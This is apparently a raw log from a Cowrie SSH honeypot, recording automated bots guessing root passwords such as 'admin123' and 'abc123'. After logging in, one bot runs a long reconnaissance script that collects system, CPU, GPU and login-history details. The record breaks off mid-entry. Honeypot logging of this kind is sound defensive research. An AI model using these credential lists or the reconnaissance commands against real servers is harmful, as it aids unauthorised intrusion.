{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:39:49.938857Z","src_ip":"185.93.89.7","session":"ba59f542334b"}
{"eventid":"cowrie.login.success","username":"root","password":"index@1","message":"login attempt [root/index@1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:49.996920Z","src_ip":"185.93.89.7","session":"ba59f542334b"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:50.049942Z","src_ip":"185.93.89.7","session":"ba59f542334b"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38834,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f6777803047","protocol":"ssh","message":"New connection: 185.93.89.7:38834 (1.2.3.4:22) [session: 5f6777803047]","sensor":"my-vps","timestamp":"2025-08-28T08:39:59.481478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:59.482162Z","src_ip":"185.93.89.7","session":"5f6777803047"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:39:59.500098Z","src_ip":"185.93.89.7","session":"5f6777803047"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@1","message":"login attempt [root/Index@1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:59.537487Z","src_ip":"185.93.89.7","session":"5f6777803047"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:59.556131Z","src_ip":"185.93.89.7","session":"5f6777803047"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56666,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba3d1e7ab7a3","protocol":"ssh","message":"New connection: 51.79.164.132:56666 (1.2.3.4:22) [session: ba3d1e7ab7a3]","sensor":"my-vps","timestamp":"2025-08-28T08:40:03.902000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:40:04.583780Z","src_ip":"51.79.164.132","session":"ba3d1e7ab7a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:40:04.584804Z","src_ip":"51.79.164.132","session":"ba3d1e7ab7a3"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:40:07.747396Z","src_ip":"51.79.164.132","session":"ba3d1e7ab7a3"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:09.018839Z","src_ip":"51.79.164.132","session":"ba3d1e7ab7a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34998,"dst_ip":"1.2.3.4","dst_port":22,"session":"39a0f2af1786","protocol":"ssh","message":"New connection: 212.227.125.160:34998 (1.2.3.4:22) [session: 39a0f2af1786]","sensor":"my-vps","timestamp":"2025-08-28T08:40:17.528063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:40:18.870141Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:40:18.870886Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:40:27.647738Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:40:30.596525Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.597312Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.597790Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.598842Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.599673Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.600532Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.601332Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.602339Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.602915Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.603624Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.604196Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.604911Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:40:30.605463Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33164,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7f578988ccc","protocol":"ssh","message":"New connection: 51.79.164.132:33164 (1.2.3.4:22) [session: b7f578988ccc]","sensor":"my-vps","timestamp":"2025-08-28T08:40:31.544999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:40:31.721296Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:40:32.141394Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:32.142311Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.session.closed","duration":"14.6","message":"Connection lost after 14.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:32.143828Z","src_ip":"212.227.125.160","session":"39a0f2af1786"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:40:32.322957Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:40:33.767907Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:40:35.105231Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:40:35.106018Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:35.494052Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:35.495315Z","src_ip":"51.79.164.132","session":"b7f578988ccc"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38484,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a8c73d41332","protocol":"ssh","message":"New connection: 185.93.89.7:38484 (1.2.3.4:22) [session: 2a8c73d41332]","sensor":"my-vps","timestamp":"2025-08-28T08:40:40.142206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:40:40.147835Z","src_ip":"185.93.89.7","session":"2a8c73d41332"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:40:40.176883Z","src_ip":"185.93.89.7","session":"2a8c73d41332"}
{"eventid":"cowrie.login.success","username":"root","password":"index123","message":"login attempt [root/index123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:40:40.222685Z","src_ip":"185.93.89.7","session":"2a8c73d41332"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:40.241957Z","src_ip":"185.93.89.7","session":"2a8c73d41332"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37660,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9ccbf22a280","protocol":"ssh","message":"New connection: 185.93.89.7:37660 (1.2.3.4:22) [session: a9ccbf22a280]","sensor":"my-vps","timestamp":"2025-08-28T08:40:49.063954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:40:49.143864Z","src_ip":"185.93.89.7","session":"a9ccbf22a280"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-